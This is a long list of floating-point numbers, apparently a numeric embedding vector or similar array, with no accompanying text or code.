-0.020122868940234184, -0.019363287836313248, 0.013997993431985378, 0.018941298127174377, 0.014986653812229633, 0.010995839722454548, 0.016300849616527557, -0.0182420015335083, 0.025777528062462807, 0.005956079810857773, -0.005434621125459671, 0.012358262203633785, -0.022534236311912537, -0.009500791318714619, 0.0007392350817099214, 0.00034719935501925647, -0.038533665239810944, 0.01650581695139408, -0.001990885939449072, 0.032119426876306534, -0.0066794902086257935, -0.0015628681285306811, 0.015336302109062672, 0.03255347162485123, -0.012346206232905388, -0.021967565640807152, 0.009874553419649601, -0.011827761307358742, -0.015312189236283302, 0.005235683638602495, -0.00276553793810308, 0.03378327190876007, -0.009530933573842049, 0.005229655187577009, 0.023534955456852913, 0.01709660142660141, 0.024499502032995224, 0.0352783203125, -0.02628391422331333, -0.029611602425575256, 0.021147700026631355, -0.007559639867395163, -0.010218173265457153, -0.018856899812817574, -0.07181055098772049, 0.031058423221111298, 0.017904410138726234, -0.01517956331372261, -0.029322238638997078, -0.004837807733565569, 0.008711067959666252, -0.030310899019241333, -0.028164781630039215, 0.012876707129180431, 0.025222912430763245, -0.030021535232663155, 0.018627820536494255, -0.014950484037399292, 0.00538639398291707, -0.007203962653875351, 0.01949591375887394, 0.026115119457244873, 0.003369887126609683, -0.02693498507142067, 0.019845562055706978, 0.009344052523374557, -0.019628537818789482, 0.006601120810955763, 0.01691574789583683, -0.018736332654953003, -0.0025786568876355886, 0.011689107865095139, -0.0059982785023748875, -0.004747381433844566, -0.03327688202261925, 0.004014928359538317, -0.00968767236918211, 0.02628391422331333, -0.01077278796583414, -0.008415675722062588, -0.006703604012727737, 0.00008797726331977174, 0.03718329966068268, -0.02219664491713047, 0.035543568432331085, 0.01871221885085106, 0.019230661913752556, 0.010983782820403576, -0.008349362760782242, 0.04193369671702385, 0.042632993310689926, -0.051989100873470306, -0.0031408071517944336, 0.007523469161242247, 0.018097318708896637, 0.02357112616300583, -0.0011386179830878973, -0.018507251515984535, -0.007535526063293219, -0.010893356055021286, -0.0032885035034269094, -0.0005357759073376656, 0.03274638205766678, 0.0037707772571593523, -0.007270275615155697, 0.021678201854228973, 0.01810937561094761, 0.015480984933674335, -0.032239995896816254, -0.011658965609967709, 0.013780970126390457, 0.014926370233297348, -0.016276735812425613, 0.03865423426032066, -0.0027595097199082375, -0.01367245800793171, 0.00010709866182878613, 0.024161910638213158, 0.0026464767288416624, 0.010682361200451851, -0.05912674963474274, 0.015517154708504677, -0.009778098203241825, 0.017108658328652382, 0.016698725521564484, -0.001600545714609325, 0.02165408805012703, 0.05034936964511871, -0.0027986944187432528, -0.00926568266004324, 0.019700879231095314, 0.03641166165471077, -0.031154878437519073, 0.00039749901043251157, -0.009880581870675087, 0.008403618820011616, 0.03520597890019417, -0.0002739163755904883, 0.024439217522740364, 0.02483709342777729, 0.013539833016693592, -0.020798051729798317, -0.019785277545452118, -0.0042409938760101795, -0.022425726056098938, -0.01739802211523056, -0.006745802704244852, 0.010465338826179504, 0.004635855555534363, -0.009048659354448318, 0.02044840343296528, -0.015794461593031883, 0.009331995621323586, 0.0022681932896375656, -0.014528494328260422, 0.009193342179059982, 0.006558921653777361, 0.000018862363504013047, 0.022208701819181442, -0.013913595117628574, 0.017180999740958214, 0.022582463920116425, -0.027369029819965363, 0.019363287836313248, -0.01626467891037464, 0.02927401103079319, 0.01025434397161007, -0.0118458466604352, 0.013455435633659363, -0.016457589343190193, -0.03132367506623268, 0.024861207231879234, -0.015215734019875526, 0.022932112216949463, -0.006191188003867865, -0.0122979786247015, 0.006127889733761549, -0.004620784427970648, 0.004512272775173187, 0.017482420429587364, -0.014419982209801674, 0.016107941046357155, -0.008186595514416695, -0.011333431117236614, -0.006191188003867865, -0.00971781462430954, 0.005925937555730343, -0.0003941080067306757, -0.033132199198007584, -0.02171437256038189, -0.014227072708308697, -0.004120425786823034, -0.015167506411671638, -0.037231527268886566, -0.02290799841284752, 0.004455002956092358, 0.011689107865095139, 0.007933401502668858, 0.03395206481218338, 0.014046220108866692, 0.014106504619121552, 0.005736042279750109, 0.019242718815803528, 0.023848433047533035, -0.04101737588644028, -0.0011725279036909342, -0.05367705971002579, 0.01157456822693348, 0.02531936764717102, -0.015191620215773582, 0.023293817415833473, 0.004036027938127518, -0.037110958248376846, -0.02388460375368595, -0.008765324018895626, -0.006715660914778709, 0.02087039314210415, -0.004421846475452185, 0.026621505618095398, 0.0027851304039359093, 0.026428597047924995, -0.0066855186596512794, 0.0036351378075778484, 0.008825607597827911, -0.0002748583210632205, 0.00162767362780869, 0.0032885035034269094, -0.024390989914536476, 0.007668151054531336, -0.008415675722062588, 0.003409072058275342, 0.019278889521956444, -0.0441521555185318, 0.016891635954380035, 0.007674179505556822, 0.001004485646262765, 0.02604277804493904, 0.012816422618925571, 0.028478259220719337, -0.007258218713104725, 0.027248462662100792, 0.02604277804493904, 0.0008809029823169112, 0.004738338757306337, -0.005937994457781315, -0.008656811900436878, 0.0014076362131163478, -0.026959097012877464, -0.021846996620297432, 0.047238703817129135, -0.05690829083323479, -0.013129900209605694, 0.0027067610062658787, 0.023185307160019875, -0.0034874414559453726, -0.016457589343190193, 0.00606157723814249, 0.020134925842285156, -0.029370466247200966, -0.008234823122620583, 0.020605143159627914, -0.026766188442707062, 0.02910521626472473, 0.0017165928147733212, -0.0030383241828531027, -0.02394488826394081, -0.014564665034413338, 0.020918620750308037, 0.02441510371863842, -0.017494477331638336, -0.01685546524822712, -0.0003372147912159562, 0.0042620934545993805, -0.013937708921730518, 0.002908712951466441, -0.019942015409469604, -0.033035747706890106, -0.02652505226433277, -0.007650066167116165, 0.01955619640648365, 0.025343481451272964, -0.024595957249403, -0.0008341827197000384, -0.0042892214842140675, -0.006751831155270338, -0.003381944028660655, 0.005684800911694765, -0.014829915016889572, 0.007475242018699646, 0.0024535672273486853, -0.024029284715652466, 0.005292953457683325, 0.020798051729798317, -0.0066794902086257935, -0.025150571018457413, 0.013684514909982681, -0.0037707772571593523, -0.013961822725832462, 0.01788029633462429, 0.013913595117628574, -0.027103779837489128, 0.011912159621715546, 0.00007474299491150305, -0.019158320501446724, -0.02044840343296528, 0.015673894435167313, -0.0009547511581331491, -0.02124415524303913, -0.0290328748524189, 0.014166789129376411, -0.01878455840051174, -0.004081240855157375, -0.0066855186596512794, -0.012478831224143505, 0.01847108080983162, -0.012285921722650528, -0.031347788870334625, 0.014335584826767445, -0.0001127503055613488, 0.05849979445338249, 0.02640448324382305, 0.023233532905578613, 0.027152007445693016, 0.02183493971824646, -0.01523984782397747, 0.006492609158158302, 0.01829022914171219, 0.04338051751255989, -0.012840536423027515, -0.0064021828584373, 0.014118561521172523, 0.023956945165991783, -0.0043042926117777824, -0.01955619640648365, -0.01344337873160839, -0.015746235847473145, -0.001250143744982779, -0.0033668731339275837, -0.01170116476714611, 0.016771066933870316, -0.006474523805081844, -0.03132367506623268, 0.06597504019737244, -0.002540979301556945, 0.00002955339186883066, -0.016035599634051323, -0.02512645721435547, -0.01077278796583414, 0.015372472815215588, 0.018917184323072433, -0.008415675722062588, -0.015010767616331577, 0.005223626736551523, -0.006037463434040546, -0.022703032940626144, 0.0014302427880465984, 0.0069025419652462006, -0.014540551230311394, -0.00813233945518732, -0.03983580321073532, 0.021786712110042572, -0.007836947217583656, -0.01302138902246952, -0.022944169119000435, -0.007993686012923717, -0.012515001930296421, -0.04313937947154045, -0.023414386436343193, -0.010169945657253265, -0.03551945462822914, -0.0055943746119737625, -0.01709660142660141, -0.00299160392023623, -0.0024460316635668278, 0.005500934086740017, -0.0073124743066728115, 0.013141957111656666, 0.025174684822559357, 0.02046046033501625, 0.020146982744336128, 0.010513565503060818, 0.00133906293194741, -0.025656959041953087, 0.010218173265457153, -0.03797905147075653, 0.018374627456068993, -0.03547122702002525, 0.008295106701552868, 0.012997275218367577, 0.022654805332422256, -0.022847715765237808, 0.030262673273682594, 0.017892353236675262, 0.015915030613541603, -0.01310578640550375, -0.03040735423564911, -0.029081102460622787, -0.019688822329044342, -0.013660401105880737, 0.006884456612169743, -0.009416393004357815, 0.0024309607688337564, 0.0034844272304326296, 0.013479548506438732, -0.005947037134319544, 0.017844125628471375, -0.011243004351854324, 0.030672604218125343, -0.02351084165275097, -0.04383867606520653, 0.004171667154878378, 0.029611602425575256, -0.0027414243668317795, -0.020906563848257065, -0.00359293888323009, -0.007173820864409208, 0.022811545059084892, -0.0069025419652462006, 0.004442946054041386, -0.03113076463341713, -0.007191906217485666, 0.013479548506438732, -0.0011664994526654482, -0.01394976582378149, -0.024222195148468018, 0.02219664491713047, -0.0066855186596512794, 0.007710350211709738, 0.00009965732897398993, -0.003372901352122426, -0.015493041835725307, -0.0007136143394745886, -0.01571006514132023, -0.010423139669001102, -0.027152007445693016, 0.025295253843069077, -0.06992968171834946, -0.019158320501446724, -0.046949341893196106, -0.020798051729798317, -0.00032025986001826823, 0.030624378472566605, 0.004132482688874006, -0.001250143744982779, 0.005470791831612587, 0.002435482107102871, 0.013708628714084625, -0.010808958671987057, 0.013069616630673409, 0.003192048752680421, 0.024511558935046196, -0.031058423221111298, 0.02765839546918869, -0.032915178686380386, 0.013310752809047699, -0.0014242144534364343, 0.014914313331246376, 0.031950630247592926, -0.03797905147075653, 0.00356279662810266, 0.03096196986734867, -0.03696627542376518, 0.02105124481022358, -0.013298695906996727, -0.0020345919765532017, -0.027754848822951317, -0.0015960243763402104, 0.016119997948408127, -0.026766188442707062, 0.015131336636841297, -0.029370466247200966, -0.0008424717816524208, 0.013660401105880737, -0.014528494328260422, -0.0038280473090708256, 0.02292005531489849, -0.01181570440530777, 0.03113076463341713, -0.014902256429195404, 0.005823454353958368, -0.02363140881061554, -0.0011469071032479405, 0.045140814036130905, -0.016566099599003792, 0.012478831224143505, -0.0026118133682757616, 0.004991532303392887, -0.0038190046325325966, -0.00962738785892725, 0.014733460731804371, -0.021099472418427467, -0.0006314771017059684, 0.0008402111707255244, 0.012171381153166294, 0.005298981908708811, 0.001959236804395914, -0.031058423221111298, -0.002745945705100894, 0.006414239760488272, -0.024812979623675346, -0.005253768526017666, -0.03243290260434151, 0.023534955456852913, -0.0036140382289886475, -0.007577724754810333, -0.04755218327045441, -0.0003034933179151267, -0.028574714437127113, -0.01829022914171219, 0.011562511324882507, 0.019242718815803528, -0.031106650829315186, -0.01595120131969452, -0.03419320285320282, 0.0031739636324346066, 0.008114254102110863, -0.00746921356767416, -0.0021235111635178328, -0.02141295000910759, -0.003258361481130123, 0.015251904726028442, 0.0066433195024728775, 0.03342156484723091, 0.0029961250256747007, 0.010851157829165459, -0.006145975086838007, -0.023607295006513596, 0.01944768615067005, 0.010567821562290192, 0.021931394934654236, 0.0173377376049757, -0.00524774007499218, 0.007481270004063845, -0.03805139288306236, -0.02316119335591793, 0.0014151717768982053, 0.004394718911498785, 0.009874553419649601, -0.003843118203803897, 0.013214298523962498, 0.0005821193917654455, 0.019833505153656006, 0.0032854892779141665, -0.005919909104704857, 0.01160471048206091, -0.04195781052112579, 0.04065566882491112, 0.001864289166405797, -0.008216737769544125, 0.0006431571673601866, -0.004391704685986042, 0.011900102719664574, 0.02388460375368595, 0.006637291517108679, -0.027127893641591072, 0.02465624175965786, -0.001701521803624928, -0.007644037716090679, -0.013636288233101368, 0.03011799044907093, -0.009826325811445713, -0.0003596329770516604, -0.010905412957072258, -0.029780399054288864, -0.03277049586176872, -0.0018974454142153263, -0.0034422283060848713, 0.050060007721185684, -0.0006932683754712343, -0.017651215195655823, 0.013768913224339485, -0.007083394564688206, -0.020544858649373055, -0.014239129610359669, 0.01352777611464262, 0.0011778026819229126, -0.013250469230115414, -0.004714224953204393, 0.02070159651339054, -0.022883884608745575, 0.011664994060993195, 0.010808958671987057, -0.02891230583190918, 0.0038220188580453396, 0.004099326208233833, 0.021666144952178, 0.017795898020267487, -0.0023269704543054104, 0.0033578304573893547, 0.0007652326603420079, -0.018748389557003975, 0.007559639867395163, 0.01619233749806881, -0.024511558935046196, 0.015818575397133827, 0.04017339646816254, 0.0037647488061338663, -0.014082390815019608, -0.01590297371149063, 0.018495194613933563, -0.0002537588297855109, 0.008554329164326191, 0.005627530626952648, 0.010959669016301632, -0.0370868444442749, -0.04330817610025406, -0.02951514907181263, 0.021256212145090103, -0.016771066933870316, 0.02616334706544876, -0.020050527527928352, -0.013696571812033653, -0.017976751551032066, 0.03484427183866501, 0.014685233123600483, -0.019640594720840454, 0.006426296662539244, -0.008765324018895626, -0.006378069054335356, -0.013419264927506447, 0.006203244905918837, 0.003867232007905841, 0.02580164186656475, 0.004566528834402561, 0.014685233123600483, 0.0024626099038869143, 0.011737335473299026, 0.021099472418427467, -0.00029445067048072815, -0.01067633368074894, -0.0036381520330905914, -0.036315206438302994, 0.010953640565276146, 0.010278457775712013, -0.004036027938127518, -0.041475534439086914, 0.027200235053896904, 0.02124415524303913, 0.018929241225123405, 0.009645473212003708, -0.007390843704342842, 0.013660401105880737, 0.01352777611464262, -0.012014642357826233, 0.020846279338002205, 0.021256212145090103, -0.011134493164718151, 0.004129468463361263, 0.017144829034805298, -0.002337520243600011, -0.017205113545060158, -0.013636288233101368, 0.017084544524550438, -0.01913420669734478, -0.0005233422853052616, 0.012756138108670712, 0.007059280760586262, -0.005078944377601147, -0.014890199527144432, 0.0062635294161736965, 0.0073486450128257275, -0.017193056643009186, -0.00007168169395299628, -0.021364722400903702, 0.004458017181605101, -0.01316607091575861, 0.011417829431593418, 0.015203677117824554, -0.022522179409861565, 0.01703631691634655, 0.009832354262471199, -0.02278743125498295, 0.024427160620689392, -0.013093730434775352, 0.00704722385853529, -0.006450410466641188, 0.00415358180180192, 0.0049131629057228565, -0.011646908707916737, -0.01902569644153118, -0.01763916015625, -0.021702315658330917, -0.0042831930331885815, -0.01835051365196705, -0.00676388805732131, 0.025873981416225433, 0.012490888126194477, -0.016216451302170753, -0.0322641097009182, 0.01703631691634655, 0.02628391422331333, 0.02033989131450653, 0.00603143498301506, -0.014588777907192707, 0.0009065237827599049, -0.003948615398257971, -0.021762598305940628, 0.0062575009651482105, 0.00031894113635644317, 0.011176692321896553, -0.006836229003965855, 0.0296357162296772, 0.01109229400753975, 0.0025259084068238735, -0.006070619914680719, -0.02531936764717102, -0.01151428371667862, -0.012255779467523098, 0.01035079825669527, 0.034169089049100876, 0.03137190267443657, 0.025753414258360863, 0.00035869103157892823, -0.05295364931225777, -0.0064021828584373, 0.00046946326619945467, 0.016927804797887802, 0.008270992897450924, -0.01058590691536665, 0.03262581303715706, -0.012141239829361439, -0.006842257454991341, 0.014709346927702427, 0.012430603615939617, -0.028960533440113068, 0.00939227920025587, -0.016119997948408127, 0.017084544524550438, -0.019785277545452118, 0.00878943782299757, -0.014227072708308697, -0.0028680211398750544, 0.008928091265261173, -0.004792594350874424, -0.03597761690616608, -0.028092440217733383, -0.002159681636840105, 0.026838529855012894, -0.00527788233011961, -0.01086321473121643, 0.019049810245633125, 0.015372472815215588, 0.025464048609137535, 0.005057845264673233, 0.01835051365196705, -0.0021762598771601915, -0.01739802211523056, -0.0008432253380306065, 0.008506101556122303, -0.020798051729798317, 0.002402325626462698, -0.00005416159183369018, -0.009904695674777031, 0.013274583034217358, -0.005184441804885864, -0.042078375816345215, 0.029804512858390808, 0.009898667223751545, 0.040462762117385864, -0.0037979050539433956, -0.022871827706694603, -0.008777380920946598, -0.010097605176270008, -0.0020993975922465324, -0.004316349513828754, 0.007402900606393814, -0.02112358622252941, -0.0034693561028689146, -0.006595092359930277, 0.016107941046357155, -0.021220041438937187, -0.0011340966448187828, -0.0031046366784721613, 0.006456438452005386, 0.004355533979833126, -0.0032824750524014235, 0.010845129378139973, -0.0025138515047729015, -0.018338456749916077, -0.006727717816829681, -0.008656811900436878, 0.01804909110069275, -0.012671740725636482, -0.014323527924716473, 0.0007264246814884245, 0.00954299047589302, -0.01388948131352663, -0.023016510531306267, -0.006269557401537895, -0.00715573551133275, 0.005720971152186394, 0.013708628714084625, -0.019483856856822968, 0.007625952363014221, -0.03617052361369133, 0.007228076457977295, -0.0011265610810369253, 0.011773506179451942, -0.025464048609137535, -0.0022531221620738506, -0.011333431117236614, -0.0022742217406630516, -0.0016789152286946774, -0.010905412957072258, -0.017711499705910683, -0.004343477077782154, -0.010037320666015148, -0.014227072708308697, 0.025705186650156975, 0.0062575009651482105, 0.006980911362916231, -0.008837664499878883, -0.00009424117160961032, 0.016457589343190193, 0.011677050963044167, 0.02332998812198639, 0.026139233261346817, -0.02129238285124302, 0.004726281855255365, 0.00004335282210377045, 0.0032915177289396524, -0.017494477331638336, 0.034410227090120316, 0.021027131006121635, 0.01908598095178604, 0.01895335502922535, 0.006878428161144257, 0.027875417843461037, -0.014504380524158478, -0.0186519343405962, -0.022510122507810593, -0.027393143624067307, -0.00951284822076559, -0.013395151123404503, -0.028526486828923225, -0.002036099089309573, -0.004870964214205742, -0.01985761895775795, 0.01896541193127632, 0.03023855946958065, -0.008735181763768196, -0.022401612251996994, -0.012490888126194477, 0.0102844862267375, 0.013925652019679546, -0.004470074083656073, 0.0049101486802101135, 0.03479604423046112, 0.03629109263420105, -0.02032783441245556, -0.012346206232905388, -0.02734491601586342, 0.013865367509424686, -0.024981776252388954, 0.03686982020735741, -0.00800574291497469, -0.01854342222213745, -0.00015438409172929823, 0.011930244974792004, 0.00903057400137186, -0.0007234105141833425, 0.016843408346176147, 0.01775972731411457, 0.026621505618095398, 0.0039305305108428, 0.03904005140066147, -0.03460313379764557, 0.01502282451838255, -0.008723124861717224, 0.008524186909198761, 0.015565382316708565, -0.03190240263938904, -0.0031799920834600925, -0.01644553244113922, -0.0019788290373981, 0.0049071344546973705, -0.009681643918156624, 0.004473088309168816, -0.020725710317492485, -0.011429885402321815, 0.009398307651281357, 0.0030579164158552885, 0.011773506179451942, -0.0022802501916885376, 0.031588923186063766, 0.010405054315924644, 0.021810825914144516, 0.006492609158158302, -0.008976318873465061, 0.02352289855480194, 0.02705555222928524, -0.010537679307162762, -0.007107507903128862, -0.008174538612365723, 0.008084111846983433, -0.005540118552744389, -0.014926370233297348, 0.007475242018699646, 0.009476677514612675, 0.020593086257576942, 0.03431377187371254, -0.004464045632630587, -0.02453567273914814, -0.005684800911694765, -0.005850582383573055, -0.02100301720201969, -0.008680925704538822, -0.039136506617069244, 0.0018477109260857105, -0.00547380605712533, -0.000027151441827300005, 0.01049548014998436, 0.004090283531695604, 0.020315777510404587, -0.01296110451221466, 0.0031498498283326626, 0.01425118651241064, -0.008144396357238293, -0.00454542925581336, -0.001600545714609325, 0.022582463920116425, -0.01457672193646431, 0.004204823635518551, 0.012466774322092533, -0.004361562430858612, 0.00929582491517067, 0.0011574567761272192, -0.0364840030670166, 0.012219608761370182, 0.009633416309952736, -0.029056988656520844, -0.008578442968428135, 0.017349794507026672, -0.016566099599003792, -0.006938712205737829, 0.013503662310540676, 0.0006280860980041325, 0.012213580310344696, -0.0014664133777841926, 0.008512130007147789, 0.0023721836041659117, -0.01661432720720768, -0.041909582912921906, 0.015251904726028442, -0.022510122507810593, -0.0034301714040338993, -0.0011868453584611416, -0.0012124661589041352, -0.0016110955039039254, -0.021931394934654236, -0.01007951982319355, -0.02183493971824646, 0.006426296662539244, -0.008723124861717224, -0.01064619142562151, -0.014769630506634712, -0.01310578640550375, 0.018205830827355385, -0.003574853530153632, -0.00948270596563816, 0.004054112825542688, -0.027079666033387184, 0.007541554514318705, 0.007414957508444786, -0.01991790160536766, -0.021678201854228973, -0.008849721401929855, -0.025946322828531265, -0.0019034738652408123, -0.03817196190357208, 0.012973161414265633, 0.05247137323021889, 0.013431321829557419, 0.002057198667898774, -0.05208555608987808, 0.01595120131969452, 0.01136960182338953, -0.004448974505066872, -0.0073305596597492695, -0.03060026466846466, 0.007071337662637234, -0.03351802006363869, 0.004690111614763737, -0.00715573551133275, 0.01859164983034134, -0.012171381153166294, -0.006323813460767269, 0.01607177034020424, 0.03621875122189522, -0.00011811937292804942, -0.008735181763768196, 0.006070619914680719, 0.013937708921730518, 0.002604277804493904, -0.018012922257184982, -0.0024806952569633722, -0.024511558935046196, 0.006589063908904791, 0.03544711321592331, 0.010392997413873672, 0.02999742142856121, 0.02705555222928524, -0.04417626932263374, -0.00637204060330987, -0.003210134105756879, -0.014890199527144432, 0.0004185984726063907, 0.015625666826963425, -0.018205830827355385, 0.002644969616085291, -0.008680925704538822, -0.012816422618925571, -0.011960387229919434, -0.03216765448451042, -0.0055582039058208466, -0.03653223067522049, -0.00583551125600934, 0.02064131200313568, -0.0020345919765532017, 0.016216451302170753, 0.01373274251818657, 0.003394000930711627, 0.0037587203551083803, -0.0018899099668487906, 0.013009332120418549, -0.005446678027510643, 0.0030669590923935175, 0.015698008239269257, -0.013961822725832462, 0.02657327800989151, -0.011882017366588116, 0.01601148582994938, -0.0023179277777671814, -0.0019923930522054434, 0.004500216338783503, -0.006830200552940369, -0.03713507205247879, 0.005039759911596775, 0.02160586044192314, 0.0066433195024728775, 0.013624231331050396, 0.003018731717020273, -0.012647626921534538, -0.00522061251103878, 0.007794748060405254, 0.00044761024764738977, 0.007378787267953157, 0.012852593325078487, -0.004557486157864332, 0.002843907568603754, 0.009645473212003708, 0.0022923070937395096, -0.000494707259349525, -0.0019954072777181864, 0.027730735018849373, -0.005717956926673651, -0.021461177617311478, 0.0022380512673407793, 0.0370868444442749, 0.0007154981722123921, 0.022582463920116425, 0.008210709318518639, 0.02616334706544876, -0.003222191007807851, 0.00948270596563816, -0.004072198178619146, -0.024342762306332588, -0.0049222055822610855, 0.004337448626756668, -0.011152578517794609, -0.0296357162296772, 0.0032945319544523954, 0.0022712075151503086, 0.01001923531293869, -0.019182434305548668, 0.0027821161784231663, -0.02645271085202694, -0.00014675436250399798, -0.005320081487298012, 0.0022079090122133493, 0.021449120715260506, -0.008572414517402649, 0.009374194778501987, 0.0016593228792771697, -0.007041195407509804, -0.003024760168045759, -0.018917184323072433, -0.010839100927114487, -0.009036602452397346, -0.0015854747034609318, -0.014697290025651455, 0.014504380524158478, 0.024270422756671906, -0.007873117923736572, 0.004400747362524271, 0.009645473212003708, -0.0128043657168746, 0.005534090101718903, -0.0033487877808511257, -0.009187313728034496, -0.009247597306966782, -0.007053252309560776, -0.013997993431985378, 0.018073204904794693, -0.01691574789583683, -0.012454717420041561, 0.00007304750761250034, 0.00995895080268383, -0.02729669027030468, -0.014661119319498539, -0.002970504341647029, -0.02088245004415512, -0.0027775948401540518, 0.005045788362622261, -0.02633214183151722, 0.006775944959372282, -0.023137079551815987, -0.0021943452302366495, -0.010579878464341164, -0.0161320548504591, -0.005404479335993528, -0.0011227934155613184, 0.005537104327231646, 0.021557632833719254, 0.009313910268247128, -0.015396586619317532, 0.004714224953204393, -0.0012147268280386925, 0.008940148167312145, 0.018856899812817574, -0.014986653812229633, 0.023378215730190277, 0.0014212002279236913, 0.003210134105756879, 0.006504666060209274, 0.00965753011405468, -0.011948330327868462, -0.010808958671987057, 0.014624948613345623, -0.005362280178815126, 0.0006250718724913895, -0.025994550436735153, -0.017229227349162102, -0.003921487834304571, -0.01745830662548542, -0.006052534561604261, -0.02758605405688286, 0.0030669590923935175, 0.0031197078060358763, -0.003927516285330057, -0.01265968382358551, -0.01388948131352663, 0.014540551230311394, 0.008500073105096817, 0.008578442968428135, -0.02130443975329399, -0.006781973410397768, 0.006408211309462786, 0.005259796977043152, -0.019218605011701584, 0.0012893284438177943, -0.009380223229527473, -0.020074641332030296, -0.010603992268443108, 0.0003952383412979543, -0.015987372025847435, 0.016927804797887802, -0.01794058084487915, 0.018398739397525787, 0.00039486156310886145, 0.012086983770132065, -0.017422135919332504, 0.002325463341549039, 0.05632956326007843, 0.009398307651281357, -0.009108943864703178, -0.0019773219246417284, -0.013805083930492401, -0.028044214472174644, -0.0009479691507294774, 0.02548816241323948, 0.0158306322991848, 0.01589091680943966, -0.010983782820403576, 0.013901538215577602, -0.00004106861524633132, 0.009591217152774334, -0.01187598891556263, 0.0030579164158552885, -0.024861207231879234, -0.0042379796504974365, -0.010808958671987057, 0.024981776252388954, 0.023981057107448578, -0.020556915551424026, 0.0049131629057228565, 0.004210852086544037, 0.00398780032992363, -0.007764605805277824, -0.02609100565314293, 0.00701708160340786, -0.008940148167312145, 0.020134925842285156, -0.0030760017689317465, -0.01538452971726656, -0.017795898020267487, -0.0033246739767491817, 0.006329841911792755, -0.015203677117824554, -0.013419264927506447, 0.023378215730190277, 0.01302138902246952, 0.0038250330835580826, 0.018929241225123405, 0.015420700423419476, 0.01016391720622778, 0.007384815253317356, 0.0034904556814581156, -0.0049583762884140015, 0.012973161414265633, 0.01631290651857853, -0.01919449120759964, -0.027224348857998848, 0.011996557004749775, -0.0031649209558963776, -0.02628391422331333, -0.025873981416225433, 0.012490888126194477, 0.024029284715652466, 0.012135211378335953, -0.004560500383377075, 0.019604424014687538, 0.01859164983034134, 0.005491891410201788, 0.013937708921730518, -0.0016397304134443402, -0.00390038825571537, -0.013190184719860554, -0.016722839325666428, -0.0024595956783741713, -0.0060223923064768314, -0.0201590396463871, 0.014769630506634712, 0.006462466903030872, 0.0007716378895565867, -0.005781255662441254, -0.012189466506242752, -0.004039042163640261, 0.02597043663263321, -0.00005402030365075916, 0.0014536029193550348, -0.009723843075335026, -0.015191620215773582, -0.009338024072349072, -0.023956945165991783, 0.01061604917049408, -0.0016713796649128199, 0.0022531221620738506, 0.003074494656175375, 0.00026336664450354874, 0.010784844867885113, 0.022883884608745575, -0.02688675746321678, 0.004485145211219788, -0.0012983711203560233, 0.000262613088125363, 0.016602270305156708, 0.00016135444457177073, 0.008494044654071331, -0.0008356898324564099, 0.02314913645386696, 0.00029803006327711046, -0.004343477077782154, -0.007451128214597702, 0.0022079090122133493, 0.006269557401537895, -0.0025048088282346725, 0.026597391813993454, -0.010013206861913204, 0.002014999743551016, 0.028405919671058655, -0.0066915471106767654, 0.010121718980371952, 0.011803647503256798, -0.007746520917862654, -0.003024760168045759, 0.014287357218563557, -0.0018944311887025833, 0.02536759525537491, -0.006992968264967203, 0.008379505015909672, -0.007680207956582308, -0.011056123301386833, 0.008916034363210201, -0.024511558935046196, 0.0005478327511809766, 0.0027203247882425785, 0.03551945462822914, -0.009114972315728664, -0.007264247164130211, 0.0002897409722208977, -0.000021782379917567596, -0.024740638211369514, -0.008602556772530079, -0.01352777611464262, 0.029466921463608742, -0.001213219715282321, 0.010115690529346466, 0.0016020528273656964, -0.01878455840051174, 0.007867089472711086, -0.01061604917049408, 0.021629974246025085, 0.004717239178717136, 0.011466056108474731, 0.003544711507856846, 0.019339174032211304, -0.027923645451664925, 0.009862496517598629, -0.008825607597827911, 0.002768552163615823, -0.003068466205149889, 0.00906071625649929, 0.0069145988672971725, 0.00012075680569978431, 0.0113394595682621, -0.005419550463557243, -0.00676388805732131, 0.017542704939842224, -0.004424860700964928, -0.003074494656175375, -0.0017708486411720514, 0.005033731460571289, 0.00563958752900362, -0.01223769411444664, -0.00018273650493938476, 0.019399458542466164, -0.0031377929262816906, 0.009145114570856094, 0.03216765448451042, 0.008078084327280521, -0.018615763634443283, -0.0008665854693390429, -0.0016020528273656964, -0.02536759525537491, -0.008072055876255035, 0.0037647488061338663, -0.000973589951172471, 0.010845129378139973, 0.020725710317492485, -0.009199369698762894, 0.0143114710226655, -0.006281614303588867, 0.012273864820599556, 0.011508255265653133, 0.0029509118758141994, -0.03633932024240494, 0.0017150857020169497, -0.0027806090656667948, -0.0022832644172012806, 0.007463185116648674, -0.02483709342777729, -0.016107941046357155, -0.02351084165275097, -0.004834793508052826, 0.008469930849969387, -0.0036803509574383497, 0.0004329159564804286, -0.029973307624459267, 0.007680207956582308, 0.007203962653875351, -0.00803588517010212, 0.012515001930296421, -0.009778098203241825, 0.021039187908172607, 0.021871110424399376, 0.007662123069167137, -0.002346562687307596, 0.014215015806257725, -0.005853596609085798, -0.007011053618043661, -0.009488734416663647, 0.0055943746119737625, 0.0010059927590191364, 0.002669083420187235, 0.017832068726420403, 0.008313192054629326, 0.011236976832151413, -0.023559069260954857, 0.028116554021835327, -0.003249318804591894, -0.0020466488786041737, -0.012189466506242752, 0.024101626127958298, -0.03301163390278816, 0.005452706478536129, -0.008976318873465061, -0.008632699027657509, -0.010652219876646996, 0.0016532944282516837, -0.021678201854228973, -0.0036532229278236628, -0.00251234439201653, 0.01226783636957407, -0.01566183753311634, -0.02879173867404461, 0.004470074083656073, -0.02141295000910759, 0.009024545550346375, 0.02272714674472809, 0.0207618810236454, -0.0015628681285306811, -0.013310752809047699, -0.004415818024426699, -0.0025108372792601585, 0.016566099599003792, 0.004729296080768108, 0.0018944311887025833, -0.0017165928147733212, -0.01167102251201868, -0.00648055225610733, 0.031154878437519073, -0.01100789662450552, -0.01763916015625, 0.000924609019421041, -0.00995895080268383, -0.010055406019091606, -0.0025997564662247896, 0.008204680867493153, 0.029949193820357323, 0.0042831930331885815, -0.010392997413873672, 0.009350080974400043, -0.036387547850608826, -0.002958447439596057, -0.014395869337022305, 0.002626884263008833, -0.0167348962277174, 0.020918620750308037, 0.022775374352931976, -0.0005723232170566916, -0.009036602452397346, -0.020966848358511925, -0.0037768057081848383, 0.01564978063106537, -0.012732024304568768, -0.005193484481424093, 0.00527788233011961, -0.010664276778697968, 0.0014860057272017002, 0.0025424864143133163, -0.006842257454991341, 0.01044122502207756, 0.018820729106664658, -0.006842257454991341, -0.004373619332909584, -0.009952922351658344, 0.0007354673580266535, 0.0034603134263306856, -0.014673176221549511, 0.031347788870334625, -0.0012411011848598719, -0.01550509873777628, -0.01644553244113922, -0.01878455840051174, 0.015565382316708565, 0.03537477180361748, -0.003036817070096731, 0.00611884705722332, -0.008144396357238293, -0.004138510674238205, 0.020737767219543457, 0.03414497524499893, -0.002411368303000927, 0.005705900490283966, 